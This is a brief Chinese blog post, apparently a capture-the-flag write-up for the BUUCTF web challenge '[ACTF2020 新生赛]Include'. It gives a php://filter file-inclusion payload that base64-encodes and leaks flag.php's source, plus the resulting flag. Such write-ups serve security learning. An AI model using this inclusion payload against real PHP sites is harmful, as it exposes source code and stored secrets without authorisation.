Buuctf-web-[ACTF2020 新生赛]Include

根据提示tips进入

一开始傻乎乎的去抓包了,啥也没有。然后就想到了php://filter伪协议。

直接构造payload,和上一个题一样 https://www.cnblogs.com/tac2664/p/13714543.html

 

payload:?file=php://filter/convert.base64-encode/resource=flag.php

 

 

得到了一串儿base64,解码后

 

flag{88e44aa0-d0bd-4d08-afcc-db71b708d4d0}

 

posted @ 2020-09-23 09:33  夜布多  阅读(350)  评论(0编辑  收藏  举报